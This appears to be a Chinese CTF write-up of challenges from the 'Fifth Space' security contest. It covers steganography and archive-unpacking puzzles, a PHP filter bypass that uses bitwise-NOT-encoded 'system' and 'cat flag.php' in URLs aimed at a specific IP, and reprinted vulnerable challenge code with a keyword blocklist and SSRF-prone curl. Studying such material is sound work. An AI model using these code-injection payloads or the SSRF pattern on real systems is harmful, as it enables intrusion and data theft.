第五空间智能安全大赛复现

Posted waterxx

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第五空间智能安全大赛复现相关的知识,希望对你有一定的参考价值。

第五空间智能安全大赛

Misc

run

下载下来为一个exe文件,但是长得很奇怪,点开竟然显示为word,里面内容显示为Error!!!

先去kali binwalk查看有没有文件隐藏

技术图片

里面东西蛮多的,先直接foremost分离

output里面直接有一个zip,这里点击run.exe自动生成了一个tif,这个搜索为一种图像文件格式,最开始是直接加png也可以实现,但是还是保留默认选择加后缀为.tif

一张奔向厕所图

技术图片

看着就很奇怪,最开始想的是在Stegslove里面转色域或者看对比,但都不行,文件头也没有问题。

winhex里面看有提示在尾端,进行run操作

njCp1HJBPLVTxcMhUHDPwE7mPW

技术图片

那么就应该是图层问题,ps

技术图片

这里隐藏着一段代码,结合前面应该是将前面的内容在这里面的代码进行run

做题的时候大概就到这了,但是写脚本能力太差了,先借用一下

a = ‘njCp1HJBPLVTxcMhUHDPwE7mPW‘
flag = ""
for i in range(len(a)):
    if i % 2 == 0:
        flag += chr(ord(a[i]) - 1)
    else:
        flag += chr(ord(a[i]) + 1)
print flag

#mkBq0IICOMUUwdLiTICQvF6nOX

In [46]: s = ‘njCp1HJBPLVTxcMhUHDPwE7mPW‘
In [47]: res = ‘‘
In [48]: for i in xrange(len(s)):
 ...: if i % 2 == 0:
 ...: res += chr(ord(s[i]) - 1)
 ...: else:
 ...: res += chr(ord(s[i]) + 1)
 ...:

flag{mkBq0IICOMUUwdLiTICQvF6nOX}

loop

循环,看文件基本发现是在zip和我tar轮着加密的,写一下脚本

import os
import shutil
import time

def scan_file():
    files = os.listdir()
    for f in files:
        if f.endswith(‘file‘):
            return f
def unzip_it(f):
    if f[0:3]==‘tar‘:
        os.rename(f,f+‘.tar‘)
        target_path = ‘./‘
        print(type(f))
        shutil.unpack_archive(f+‘.tar‘, target_path)
        os.remove(f+‘.tar‘)
    if f[0:3]==‘zip‘:
        os.rename(f,f+‘.zip‘)
        target_path = ‘./‘
        print(type(f))
        shutil.unpack_archive(f+‘.zip‘, target_path)
        os.remove(f+‘.zip‘)
while True:
    zip_file = scan_file()
    print(zip_file)
    if zip_file:
        unzip_it(zip_file)
import os
for i in range(1000):
 os.system(‘unzip -o zipfile; tar xf tarfile; sha1sum tarfile‘)

但是我还是不会因为脚本不是我自己写的,难受,挂着真不会

hate-php

cat flag.php

取反的脚本

#__coding:utf-8__
def qufan(shell):
	for i in shell:
		hexbit=‘‘.join(hex(~(-(256-ord(i)))))
		print (hexbit.replace(‘0x‘,‘%‘),end=‘‘)
qufan(‘system‘)
print(‘	‘)
qufan(‘cat flag.php‘)

http://121.36.74.163/?code=(~ %8D%9A%9E%9B%99%96%93%9A)((~ %99%93%9E%98%D1%8F%97%8F))

%8c%86%8c%8b%9a%92
%9c%9e%8b%df%99%93%9e%98%d1%8f%97%8f

view-source:http://121.36.74.163/?code=(~%8C%86%8C%8B%9A%92)
(${%a7%ae%ac%ac^%f8%e9%e9%f8}{%a7})&%a7=cat%20flag.php

do you know

<?php
highlight_file(__FILE__);
#本题无法访问外网
#这题真没有其他文件,请不要再开目录扫描器了,有的文件我都在注释里面告诉你们了
#各位大佬...这题都没有数据库的存在...麻烦不要用工具扫我了好不好
#there is xxe.php
$poc=$_SERVER[‘QUERY_STRING‘];
if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){
                die("no hacker");
        }
$ids=explode(‘&‘,$poc);
$a_key=explode(‘=‘,$ids[0])[0];
$b_key=explode(‘=‘,$ids[1])[0];
$a_value=explode(‘=‘,$ids[0])[1];
$b_value=explode(‘=‘,$ids[1])[1];

if(!$a_key||!$b_key||!$a_value||!$b_value)
{
        die(‘我什么都没有~‘);
}
if($a_key==$b_key)
{
    die("trick");
}

if($a_value!==$b_value)
{
        if(count($_GET)!=1)
        {
                die(‘be it so‘);
        }
}
foreach($_GET as $key=>$value)
{
        $url=$value;
}

$ch = curl_init();
    if ($type != ‘file‘) {
        #add_debug_log($param, ‘post_data‘);
        // 设置超时
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    } else {
        // 设置超时
        curl_setopt($ch, CURLOPT_TIMEOUT, 180);
    }

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

    // 设置header
    if ($type == ‘file‘) {
        $header[] = "content-type: multipart/form-data; charset=UTF-8";
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    } elseif ($type == ‘xml‘) {
        curl_setopt($ch, CURLOPT_HEADER, false);
    } elseif ($has_json) {
        $header[] = "content-type: application/json; charset=UTF-8";
        curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    }

    // curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)‘);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_AUTOREFERER, 1);
    // dump($param);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $param);
    // 要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // 使用证书:cert 与 key 分别属于两个.pem文件


    $res = curl_exec($ch);
    var_dump($res);
我什么都没有~

以上是关于第五空间智能安全大赛复现的主要内容,如果未能解决你的问题,请参考以下文章

第五空间智能安全大赛-web

2020 "第五空间"智能安全大赛 Re nop

“第五空间”智能安全大赛-Web-writeup

“第五空间”智能安全大赛Misc-wp

第五空间智能安全大赛hate_php WriteUp

第四届江西省高校网络安全技能大赛 复现 2021-09-30